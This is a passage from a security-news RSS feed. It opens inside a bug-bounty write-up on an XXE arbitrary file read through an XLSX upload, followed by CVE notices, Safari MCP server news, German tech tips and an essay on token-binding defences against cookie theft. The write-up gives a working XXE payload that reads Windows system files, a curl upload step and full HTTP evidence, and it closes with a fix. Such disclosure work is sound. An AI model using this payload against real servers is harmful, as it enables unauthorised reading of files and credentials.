"file:///C:/windows/win.ini"<br>sheet1 = f"""&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;!DOCTYPE foo ..(Syntax -&gt; `[&lt;!` (medium Prevent the full code here*)) ENTITY xxe SYSTEM "{TARGET_FILE}"&gt;]&gt;<br>&lt;worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/ml/2006/main"&gt;<br>  &lt;sheetData&gt;<br>    &lt;row r="1"&gt;&lt;c r="A1" t="str"&gt;&lt;v&gt;PolicyNo&lt;/v&gt;&lt;/c&gt;&lt;/row&gt;<br>    &lt;row r="2"&gt;&lt;c r="A2" t="str"&gt;&lt;v&gt;&amp;xxe;&lt;/v&gt;&lt;/c&gt;&lt;/row&gt;<br>  &lt;/sheetData&gt;<br>&lt;/worksheet&gt;"""</pre><p>Once assembled and zipped, the upload is a standard multipart POST, indistinguishable at the transport layer from a legitimate spreadsheet. The server does the rest.</p><h3>Steps to Reproduce</h3><p><strong>Prerequisites:</strong> nothing. No account, no session token, no prior interaction with the application.</p><p><strong>Step 1.</strong> Build a valid XLSX ZIP structure containing the five files described in “Building the Payload,” with `sheet1.xml` carrying the `DOCTYPE` entity declaration targeting `file:///C:/windows/win.ini`.</p><p><strong>Step 2.</strong> POST the file to the upload endpoint:</p><pre>curl -s -X POST "https://[REDACTED]/[REDACTED]/CombineExcelUpload" \<br> -H "Referer: https://[REDACTED]/[REDACTED]/index" \<br> -F "excelFile=@OUR_PAYLOAD_FILE_CONSTRUCTED.xlsx;type=application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"</pre><p><strong>Step 3. </strong>Observe the response. The JSON will contain the contents of `C:\windows\win.ini` from the remote server. A successful read looks like:</p><pre>[*] Built: /tmp/OUR_PAYLOAD_FILE_CONSTRUCTED.xlsx<br>[*] Target: file:///C:/windows/win.ini<br>[*] Uploading...<br>[+] responseCode: 1<br>[+] File contents:<br>────────────────────────────────────────────────────────────<br>; for 16-bit app support<br>[fonts]<br>[extensions]<br>[mci extensions]<br>[files]<br>[Mail]<br>MAPI=1<br>────────────────────────────────────────────────────────────</pre><p><strong>Step 4.</strong> To read a different file, set `TARGET_FILE` at the top of the script and run again.</p><p><strong>What Came Back: The Full HTTP Evidence</strong></p><p>Three separate reads were performed to establish reproducibility, all confirmed within the same session.</p><p><strong>Read 1: `C:\windows\win.ini`</strong></p><pre>POST /[REDACTED]/CombineExcelUpload HTTP/1.1<br>Host: [REDACTED]<br>Referer: https://[REDACTED]/[REDACTED]/index<br>Origin: https://[REDACTED]<br>User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36<br>Accept: application/json, text/plain, */*<br>Content-Type: multipart/form-data; boundary=----xxeboundary<br><br>------xxeboundary<br>Content-Disposition: form-data; name="excelFile"; filename="malicious_bugbounty_1775798050.xlsx"<br>Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet<br>[Binary XLSX - xl/worksheets/sheet1.xml contains:]<br>&lt;!DOCTYPE foo ..(Syntax -&gt; `[&lt;!` (medium Prevent the full code here*)) ENTITY xxe SYSTEM "file:///C:/windows/win.ini"&gt;]&gt;<br>&lt;v&gt;&amp;xxe;&lt;/v&gt;<br>------xxeboundary--</pre><p>Response:</p><pre>HTTP/1.1 200 OK<br>Content-Type: application/json; charset=utf-8<br>X-Content-Type-Options: nosniff<br>Strict-Transport-Security: max-age=31536000; includeSubDomains<br>X-Frame-Options: SAMEORIGIN<br><br>{"uploadResult":"; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1\r\n","responseCode":"1"}</pre><p><strong>Read 2: `C:\Windows\System32\drivers\etc\hosts`</strong></p><p>Identical request structure, `TARGET_FILE` changed. Response:</p><pre>{"uploadResult":"# Copyright (c) 1993-2009 Microsoft Corp.\r\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\r\n...[REDACTED]...\r\n# localhost name resolution is handled within DNS itself.\r\n#\t127.0.0.1       localhost\r\n#\t::1             localhost\r\n","responseCode":"1"}</pre><p><strong>Read 3: `C:\Windows\system.ini`</strong></p><pre>{"uploadResult":"; for 16-bit app support\r\n[386Enh]\r\nwoafont=[REDACTED]\r\n...\r\n[drivers]\r\nwave=mmdrv.dll\r\ntimer=timer.drv\r\n[mci]\r\n","responseCode":"1"}</pre><p>Three reads. Three different file paths. Same exploit, same endpoint, same unauthenticated access. Reproducible on every run.</p><h3>What Comes After the Door Opens</h3><p>I want to be honest about what finding a vulnerability actually feels like, because the stories we tell each other often skip this part.</p><p>It doesn’t feel triumphant. Not immediately. It feels more like the moment after you’ve been carrying a question for a long time and the answer finally arrives. There’s relief, and then immediately, a new set of questions. — <em>How deep does this go? What else can I read? Can I turn this into something more?</em></p><p>I tried to push further. The natural next target was the application’s configuration file, `web.config` in ASP.NET, which would contain database credentials and API keys in plaintext. But `web.config` is itself an XML file. When its content lands inside the cell value tag, the XML parser sees `&lt;connectionStrings&gt;` and `&lt;appSettings&gt;` as XML markup rather than cell content, and throws a parse error. The file doesn’t come through.</p><p>There’s a workaround for this: the external DTD with CDATA wrapping technique. But that requires the server to make an outbound HTTP request to a server you control, to fetch the DTD. The load balancer blocked all outbound connections from the backend. Not one callback received. That path was closed. Three hundred guesses at the physical deployment path, across different drives, different naming conventions, different enterprise folder structures. None of them landed. Without the physical path, you can’t target application-specific files.</p><p><em>The vulnerability stayed where it was. An unauthenticated, reliable, in-band arbitrary file read. High (8.6) severity accepted.</em></p><h3>The Fix</h3><p>The root cause is a single configuration decision that was never made. In .NET, XML parsers have external entity resolution <strong>enabled by default</strong>. The developer who wrote the XLSX processing code used the library without reading the security section of the documentation, and the insecure default was never changed. The fix is two lines :</p><pre>var settings = new XmlReaderSettings {<br>    DtdProcessing = DtdProcessing.Prohibit,<br>    XmlResolver = null</pre><p>Or more completely: replace the custom XML parsing with a hardened XLSX library like EPPlus or ClosedXML that disables external entity resolution by design. Add authentication to the upload endpoint. Done.</p><p>That’s what this work is, at the end of it. Not a conquest. A conversation between a researcher and a system, mediated by a file format that turned out to have more to say than anyone expected.</p><p><em>The file answered back. The system is safer. The story continues</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=20dbb8161dd8" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/the-file-that-answered-back-xxe-hidden-in-cell-a2-20dbb8161dd8">The File That Answered Back — XXE Hidden in Cell A2</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43713 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 information disclosure]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1 and classified as problematic. This affects an unknown part. Executing a manipulation can lead to information disclosure.

This vulnerability appears as CVE-2026-43713. The attack may be performed from remote. There is ...]]></description>
<link>https://tsecurity.de/de/3645485/sicherheitsluecken/cve-2026-43713-apple-safariiosipadosmacos-up-to-2651-information-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645485/sicherheitsluecken/cve-2026-43713-apple-safariiosipadosmacos-up-to-2651-information-disclosure/</guid>
<pubDate>Sat, 04 Jul 2026 16:21:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown part. Executing a manipulation can lead to information disclosure.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-43713">CVE-2026-43713</a>. The attack may be performed from remote. There is no available exploit.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43721 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Website permission assignment]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. It has been rated as critical. This affects an unknown function of the component Website Handler. Performing a manipulation results in incorrect permission assignment.

This vulnerability is known as CVE-2026-43721. Re...]]></description>
<link>https://tsecurity.de/de/3645483/sicherheitsluecken/cve-2026-43721-apple-safariiosipadosmacos-up-to-2651-website-permission-assignment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645483/sicherheitsluecken/cve-2026-43721-apple-safariiosipadosmacos-up-to-2651-website-permission-assignment/</guid>
<pubDate>Sat, 04 Jul 2026 16:21:28 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown function of the component <em>Website Handler</em>. Performing a manipulation results in incorrect permission assignment.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-43721">CVE-2026-43721</a>. Remote exploitation of the attack is possible. No exploit is available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple bringt MCP-Server in die Safari Technology Preview]]></title>
<description><![CDATA[Apple hat in der Safari Technology Preview 247 einen MCP-Server für Webentwickler mit an Bord. Damit können kompatible Coding-Agenten direkt mit einem Safari-Fenster verbunden werden und sehen nicht nur euren Prompt, sondern auch, wie eine Seite tatsächlich im Browser gerendert...Zum Beitrag: App...]]></description>
<link>https://tsecurity.de/de/3644457/it-nachrichten/apple-bringt-mcp-server-in-die-safari-technology-preview/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644457/it-nachrichten/apple-bringt-mcp-server-in-die-safari-technology-preview/</guid>
<pubDate>Sat, 04 Jul 2026 00:02:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple hat in der Safari Technology Preview 247 einen MCP-Server für Webentwickler mit an Bord. Damit können kompatible Coding-Agenten direkt mit einem Safari-Fenster verbunden werden und sehen nicht nur euren Prompt, sondern auch, wie eine Seite tatsächlich im Browser gerendert...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/apple-bringt-mcp-server-in-die-safari-technology-preview/">Apple bringt MCP-Server in die Safari Technology Preview</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The browser wars aren’t about search anymore — here are the best alternatives to Chrome and Safari]]></title>
<description><![CDATA[We’ve compiled an overview of some of the top alternative browsers available today aiming to challenge Chrome and Safari.]]></description>
<link>https://tsecurity.de/de/3644245/it-nachrichten/the-browser-wars-arent-about-search-anymore-here-are-the-best-alternatives-to-chrome-and-safari/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644245/it-nachrichten/the-browser-wars-arent-about-search-anymore-here-are-the-best-alternatives-to-chrome-and-safari/</guid>
<pubDate>Fri, 03 Jul 2026 20:48:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We’ve compiled an overview of some of the top alternative browsers available today aiming to challenge Chrome and Safari.]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon behebt gruseligen Alexa-Fehler – „wie aus einem Horrorfilm“]]></title>
<description><![CDATA[Stell dir vor, du liegst abends im Bett und bittest Alexa um etwas und plötzlich klingt sie wie besessen. Genau das ist jetzt einigen Nutzer*innen passiert.]]></description>
<link>https://tsecurity.de/de/3643822/it-nachrichten/amazon-behebt-gruseligen-alexa-fehler-wie-aus-einem-horrorfilm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643822/it-nachrichten/amazon-behebt-gruseligen-alexa-fehler-wie-aus-einem-horrorfilm/</guid>
<pubDate>Fri, 03 Jul 2026 16:48:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Stell dir vor, du liegst abends im Bett und bittest Alexa um etwas und plötzlich klingt sie wie besessen. Genau das ist jetzt einigen Nutzer*innen passiert.]]></content:encoded>
</item>
<item>
<title><![CDATA[APPLE-SA-06-29-2026-3 Safari 26.5.2]]></title>
<description><![CDATA[Posted by Apple Product Security via Fulldisclosure on Jul 02APPLE-SA-06-29-2026-3 Safari 26.5.2

Safari 26.5.2 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/en-us/127685.

Apple maintains a Security Releases page at
https://...]]></description>
<link>https://tsecurity.de/de/3642054/it-security-nachrichten/apple-sa-06-29-2026-3-safari-2652/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642054/it-security-nachrichten/apple-sa-06-29-2026-3-safari-2652/</guid>
<pubDate>Thu, 02 Jul 2026 20:53:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Posted by Apple Product Security via Fulldisclosure on Jul 02</p>APPLE-SA-06-29-2026-3 Safari 26.5.2<br>
<br>
Safari 26.5.2 addresses the following issues.<br>
Information about the security content is also available at<br>
<a rel="nofollow" href="https://support.apple.com/en-us/127685">https://support.apple.com/en-us/127685</a>.<br>
<br>
Apple maintains a Security Releases page at<br>
<a rel="nofollow" href="https://support.apple.com/100100">https://support.apple.com/100100</a> which lists recent<br>
software updates with security advisories.<br>
<br>
Web Extensions<br>
Available for: macOS Sonoma and macOS Sequoia<br>
Impact: A malicious web extension may be able to cause an...<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Auto: Dieser Fehler stört Fahrer schon lange – jetzt kommt die Lösung]]></title>
<description><![CDATA[Maps erhält auf Android Auto ein Upgrade. Es behebt ein Problem, mit dem viele Nutzer*innen seit langem zu kämpfen haben.]]></description>
<link>https://tsecurity.de/de/3641660/it-nachrichten/android-auto-dieser-fehler-stoert-fahrer-schon-lange-jetzt-kommt-die-loesung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641660/it-nachrichten/android-auto-dieser-fehler-stoert-fahrer-schon-lange-jetzt-kommt-die-loesung/</guid>
<pubDate>Thu, 02 Jul 2026 18:18:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Maps erhält auf Android Auto ein Upgrade. Es behebt ein Problem, mit dem viele Nutzer*innen seit langem zu kämpfen haben.]]></content:encoded>
</item>
<item>
<title><![CDATA[„IP-Adresse konnte nicht abgerufen werden“?: So behebt ihr den WLAN-Fehler]]></title>
<description><![CDATA[Wenn sich euer Smartphone oder Laptop einfach nicht mit dem WLAN verbinden will und stattdessen die frustrierende Fehlermeldung „IP-Adresse konnte nicht abgerufen werden“ anzeigt, seid ihr nicht allein. Die meisten Ursachen könnt ihr mit unseren Tipps selbst beheben.]]></description>
<link>https://tsecurity.de/de/3641227/it-nachrichten/ip-adresse-konnte-nicht-abgerufen-werden-so-behebt-ihr-den-wlan-fehler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641227/it-nachrichten/ip-adresse-konnte-nicht-abgerufen-werden-so-behebt-ihr-den-wlan-fehler/</guid>
<pubDate>Thu, 02 Jul 2026 15:03:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wenn sich euer Smartphone oder Laptop einfach nicht mit dem WLAN verbinden will und stattdessen die frustrierende Fehlermeldung „IP-Adresse konnte nicht abgerufen werden“ anzeigt, seid ihr nicht allein. Die meisten Ursachen könnt ihr mit unseren Tipps selbst beheben.]]></content:encoded>
</item>
<item>
<title><![CDATA[Safari’s New MCP Server Is Great for Agents]]></title>
<description><![CDATA[Saron Yitbarek, writing on the WebKit blog: In Safari Technology Preview 247, we’re introducing the Safari MCP server — a Model Context Protocol server for web developers that makes your web development and debugging workflow faster and more powerful. We know agents are increasingly integral to t...]]></description>
<link>https://tsecurity.de/de/3641133/ios-mac-os/safaris-new-mcp-server-is-great-for-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641133/ios-mac-os/safaris-new-mcp-server-is-great-for-agents/</guid>
<pubDate>Thu, 02 Jul 2026 14:24:38 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Saron Yitbarek, writing on the WebKit blog: In Safari Technology Preview 247, we’re introducing the Safari MCP server — a Model Context Protocol server for web developers that makes your web development and debugging workflow faster and more powerful. We know agents are increasingly integral to the coding process and the Safari MCP server gives […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Safari Technology Preview 247 Arrives With MCP Server for Developers]]></title>
<description><![CDATA[Apple has released Safari Technology Preview 247, bringing a major new tool for web developers along with a long list of fixes across the browser. The experimental browser lets users test upcoming Safari features before Apple adds them to the main Safari release.



The biggest change in Safari T...]]></description>
<link>https://tsecurity.de/de/3640987/ios-mac-os/safari-technology-preview-247-arrives-with-mcp-server-for-developers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640987/ios-mac-os/safari-technology-preview-247-arrives-with-mcp-server-for-developers/</guid>
<pubDate>Thu, 02 Jul 2026 13:39:20 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released Safari Technology Preview 247, bringing a major new tool for web developers along with a long list of fixes across the browser. The experimental browser lets users test upcoming Safari features before Apple adds them to the main Safari release.



The biggest change in Safari Technology Preview 247 is the new Safari Model Context Protocol server, which helps developers debug websites with the support of AI agents. With this feature, an MCP-compatible AI client can connect to a Safari browser window and understand how code actually appears and behaves in the browser.



This gives developers a clearer view of the user experience on a website, which helps them find layout issues, rendering problems, and other bugs faster during development.



Safari Technology Preview 247 also includes fixes and improvements for Accessibility, CSS, Fonts, Forms, HTML, JavaScript, MathML, Media, Networking, Rendering, SVG, Scrolling, Security, Web API, WebDriver, WebGL, and more.



The update is available through Software Update in System Settings or System Preferences for users who have already downloaded Safari Technology Preview from Apple’s website.



Safari Technology Preview runs alongside the regular Safari browser, so users can test new browser features without replacing their main browser. Apple does not require a developer account to download it, although the browser mainly targets developers and advanced users who want early access to Safari changes.]]></content:encoded>
</item>
<item>
<title><![CDATA[Preventing token theft]]></title>
<description><![CDATA[When you log into a service you’re given an authentication token. Each
further request to the site includes that token, allowing the server to
figure out who you are and ensuring that you have access to your
data. Depending on site policy, this token may either be stored in memory
(and so vanish ...]]></description>
<link>https://tsecurity.de/de/3640320/downloads/preventing-token-theft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640320/downloads/preventing-token-theft/</guid>
<pubDate>Thu, 02 Jul 2026 08:31:40 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When you log into a service you’re given an authentication token. Each
further request to the site includes that token, allowing the server to
figure out who you are and ensuring that you have access to your
data. Depending on site policy, this token may either be stored in memory
(and so vanish if you restart your browser) or disk. The token is the proof
of your identity. As far as the site is concerned, anyone with your token is
you. These tokens may be traditional browser cookies, but they may also be
stored in either site local storage or (if you’re not using a browser) in
some other storage location.</p>
<p>In recent years we’ve seen infostealer malware (like
<a class="link" href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b" target="_blank" rel="noopener">LummaC2</a>)
gain the ability to exfiltrate user tokens, allowing attackers to gain
access to the user’s data without needing to retain access to the user’s
machine. This attack is viable even if the site has strong MFA requirements,
so passkeys don’t help. Encrypting the tokens on disk doesn’t prevent the
malware from scraping them out of the browser’s RAM or obtaining whatever
key is used to encrypt them. This feels like a pretty hard problem to solve.</p>
<p>But that hasn’t stopped people from trying! Dirk Balfanz wrote an IETF draft
describing a mechanism for using <a class="link" href="https://datatracker.ietf.org/doc/html/draft-balfanz-tls-obc-01" target="_blank" rel="noopener">self-signed certificates for TLS
authentication</a>. This
uses the <a class="link" href="https://en.wikipedia.org/wiki/Mutual_authentication#mTLS" target="_blank" rel="noopener">mutual
authentication</a>
feature of the TLS protocol that requires both sides prove their identity to
each other. In regular TLS, the remote site presents a signed certificate
that tells you who it is. When performing mutual authentication, you then
present a certificate to the remote site telling it who <em>you</em> are. These
client certificates are largely unused outside enterprise environments
because they’re a <em>huge</em> pain to deploy. It’s not so much that this has
sharp edges, it’s that it’s entirely made of sharp edges. Managing
certificate deployment to your devices is hard. Browsers get confused if the
certificates change under them. You have one certificate and it lives
forever, so sites you present it to can track your identity. Users are
prompted to choose a certificate to authenticate with, and if they pick the
wrong one everything breaks and is hard to recover. I’ve deployed this and I
did not have a good time.</p>
<p>But Balfanz’s idea was simple. Rather than require certificates to be
deployed, browsers would simply generate a certificate on the fly. The goal
wasn’t to prove the device or user’s identity in any global way - but it
would associate a TLS session with a specific certificate. You could then,
for example, include a hash of the certificate in the cookie, and if someone
tried to use that cookie without presenting that certificate then the cookie
could be rejected. If the browser used a hardware-backed private key for the
certificate then it would be impossible for an attacker to steal it. Sure,
you could still steal cookies, but you wouldn’t be able to use them.</p>
<p>This was written almost 15 years ago, and seems simple, elegant, and
functional. It didn’t happen. Part of the reason for that is that, well, it
wasn’t quite so simple. One problem was privacy related. Cookies are only
sent after the TLS session is established, so anyone monitoring the network
doesn’t know anything about the user identity. A naive implementation of
this approach would have meant the client certificate being sent before
session establishment, and now user identity can be tracked (no longer an
issue if this was implemented on top of TLS 1.3, but this was a log time
ago). This was avoided by reordering the client handshake, but that meant
having to modify the TLS specification and implementations would have to be
updated to support this. Another was that figuring out the granularity of
the certificates was difficult. You’d want to use different certificates for
every site to avoid them effectively becoming tracking cookies, but you need
to provide the certificate before cookies are set, and you don’t know what
origin the site is going to set in its cookies. If you generate a
certificate for a.example.com and a different one for b.example.com, and
a.example.com sets a cookie for *.example.com and includes the certificate
you used for a.example.com, that cookie isn’t going to work on b.example.com
and things are broken. This meant supporting it wasn’t as straightforward as
it seemed - you’d need to ensure that your cookie scope was compatible with
the certificate scope. You could probably make this work well enough by
aligning it with the <a class="link" href="https://publicsuffix.org/" target="_blank" rel="noopener">Public Suffix List</a>, but
there was still some risk of expectations not being aligned.</p>
<p>And, perhaps most importantly, <a class="link" href="https://datatracker.ietf.org/doc/html/rfc5077" target="_blank" rel="noopener">TLS session
resumption</a> (replaced by
<a class="link" href="https://datatracker.ietf.org/doc/html/rfc8446#page-15" target="_blank" rel="noopener">pre-shared keys</a> in
TLS 1.3) somewhat defeats the purpose of the exercise - clients store state
that allows them to re-establish a TLS connection without performing
certificate exchange (this reduces overhead if a connection gets interrupted
or you switch to a new network or anything along those lines), and anyone in
a position to steal cookies could steal that state as well.</p>
<p>The followup attempt was <a class="link" href="https://datatracker.ietf.org/doc/html/draft-balfanz-tls-channelid-01" target="_blank" rel="noopener">channel
IDs</a>.
This simplified the implementation somewhat - rather than certificates, a
raw public key would be sent, along with proof of possession of the private
key in the form of a signature over a portion of the TLS handshake. This was
required even in the event of session resumption, which avoided having to
worry about theft of session secrets. The timing of the exchange was after
the encrypted session had been established, so user identity couldn’t be
leaked that way either. Cookies could then be bound to this
identifier. Unfortunately it didn’t really deal with the problem of scoping
keys in a way that would match cookie requirements, and the spec suggests
that the right way of handling this is to scope keys to TLDs, which would
enable user tracking across sites (Chrome’s implementation apparently
restricted it to eTLD+1, which would match the third party cookie policy and
avoid the tracking risk).</p>
<p>Chrome added support for this, but it was <a class="link" href="https://groups.google.com/a/chromium.org/g/net-dev/c/AjFQjBmaEQE/m/gIXoV3IFCQAJ?utm_medium=email&amp;utm_source=footer" target="_blank" rel="noopener">removed in early
2018</a>. The
discussion of some of the pain points in that message is interesting,
explicitly calling out problems with connection coalescing across domains
and the incompatibility with zero-RTT TLS1.3. The overall consensus at the
time seems to be that trying to solve this entirely at the TLS layer has too
many rough edges, and a different approach should be taken.</p>
<p>And so almost 7 years after the initial draft for origin bound certificates,
we come to <a class="link" href="https://datatracker.ietf.org/doc/html/rfc8471" target="_blank" rel="noopener">token
binding</a>. This ended up being
a rather more complex endeavour, covering 3 different RFCs describing how it
impacts TLS, how to incorporate it into HTTP, and how to manage all the
various parties involved in the process. The short version is that it’s
pretty similar to channel ID, except that there’s also a documented
mechanism for allowing tokens to be bound to one party and consumed by
another, avoiding any need for widely scoped keys. Token binding effectively
solved all the issues in the original proposal, but at the cost of somewhat
more complexity.</p>
<p>The RFC was finalised in October 2018. Chrome removed its (incomplete,
draft) support for token binding in November 2018. Edge carried support
until late 2024. Despite getting all the way through the RFC process, it’s
functionally dead.</p>
<p>The process up until this point had been largely initiated by Google, with
Microsoft contributing significantly to the token binding standards. The
work had been focused on identifying a generic solution to the problem
rather than tying it to any specific authentication flow. The next step was
in a different direction - rather than trying to fix this for the entire
internet, how about we try to fix it for OAuth?</p>
<p><a class="link" href="https://datatracker.ietf.org/doc/html/rfc8705" target="_blank" rel="noopener">RFC 8705</a> is titled “OAuth
2.0 Mutual-TLS Client Authentication and Certificate-Bound Access
Tokens”. This is basically the 2011 approach, but (a) with an explicit
definition of how the certificate should be incorporated into issued auth
cookies, and (b) with a proviso that well uh if you’re going to use tokens
issued by your IdP to authenticate to someone else then well you’re going to
need to use the same cert for both. This is probably fine for the
company-owned-laptop case where you’re actually fine with multiple sites
being able to tie identities together (that’s kind of the point here!), and
also works for “I am using an app and not a browser”, but doesn’t work for
more generic scenarios. It also doesn’t seem to take the session resumption
case into account at all? Support for RFC8705 seems poor, as far as I can
tell of the big players only Auth0 implements it. In theory it works fine
with self-signed client certs but in reality that’s going to be almost as
difficult to support across multiple platforms as just issuing proper client
certs in the first place, so deployment is going to be kind of a pain. But
the good news is it doesn’t rely on any TLS extensions or custom browser
behaviour, so at the client side it works fine with any browser.</p>
<p>Which brings us on to <a class="link" href="https://datatracker.ietf.org/doc/html/rfc9449" target="_blank" rel="noopener">RFC
9449</a>, “Demonstrating Proof
of Possession”. This goes even further than RFC8705 in terms of reducing the
burden of deployment - it works fine with existing browsers, <em>and</em> it
doesn’t even require any certs. The client generates a keypair and provides
the pubkey when requesting the cookie. The cookie contains the pubkey. Every
request to the service now provides the cookie with the pubkey and also
provides a signature over the URI and HTTP method. If the signature matches
the pubkey in the token then clearly the signature came from the machine the
token was issued to, and everything is good.</p>
<p>This does come with some downsides, though. The first is that it uses
browser interfaces to generate the keys (typically
<a class="link" href="https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/generateKey" target="_blank" rel="noopener">crypto.subtle.generatekey()</a>)
and as far as I can tell there are no browsers that guarantee that that key
is going to be generated in hardware even if it’s marked non-exportable, so
anyone able to steal the cookies can also steal the keys. The second is that
the signature only covers the URI and HTTP method, and not the message
content or any other headers, so anyone able to exfiltrate a valid signature
can replay it against the same URI with different message content. The
recommended way to handle this is to reject any signatures that weren’t
generated within the last few seconds, which is a wonderful additional way
to allow clock skew to give you a Bad Day. And the third is that every
single request has to be separately signed, which is not intrinsically a
problem because computers are fast and have multiple cores, but if you’re
trying to solve the first problem by sticking the key in a TPM then you’re
dealing with something that’s slow and single threaded and that’s maybe
acceptable if you’re using client certificates (because there’s going to be
one signature per session and you can use the same session for multiple
requests) but probably not if you’re dealing with a user opening a browser
that restores previous tabs and each of those is a webapp that fires off 100
requests in parallel.</p>
<p>In case it wasn’t clear, I don’t like DPoP. It doesn’t feel like it actually
solves the underlying problem that we see in the real world (malware running
in a context where if it can grab the tokens it can grab the keys), it adds
a massive amount of overhead, and it has baked in replay vulnerabilities. I
don’t know why it exists and I’m incredibly suspicious of vendors telling me
that it fixes my problems, because if they’re telling me that then I’m going
to end up assuming that they either don’t understand my problems or they
don’t understand their technology, and neither of those is good.</p>
<p>Still. Then we get to the thing that prompted me to write this - Chrome’s
announcement that they had <a class="link" href="https://security.googleblog.com/2026/04/protecting-cookies-with-device-bound.html" target="_blank" rel="noopener">launched device-bound session
credentials</a>. This
is interesting because it’s a Chrome feature that’s explicitly intended to
counter on-device malware, which was one of the things that was out of scope
in 2018 when token binding was being removed. Since this is entire web level
it doesn’t have to be an RFC, and so is instead defined <a class="link" href="https://w3c.github.io/webappsec-dbsc/" target="_blank" rel="noopener">by
W3C</a>. I’m going to handwave all the
complexity and say that it’s basically a way to register a public key when a
cookie is issued, and then prove possession of the private key when it’s
time to renew the cookie. By making the cookies shortlived and having
support for rotating them in the background, user impact is basically zero
and while it’s still possible for an attacker to exfiltrate and use a cookie
they’ll only be able to do so for a short window before it needs to be
refreshed - something the attacker can’t do, since they don’t have the
private key. This avoids the DPoP overhead because you only need to do
signing once per cookie per cookie lifetime, and not on every single
request. I don’t <em>like</em> this due to the window where exfiltrated tokens can
be used, but it feels like a strict improvement over the status quo. An
extension called <a class="link" href="https://github.com/w3c/webappsec-dbsc/blob/main/DBSCE/Overview.md" target="_blank" rel="noopener">device-bound session credentials for
enterprise</a>
allows pre-enrollment of device keys, so even though the actual runtime DBCE
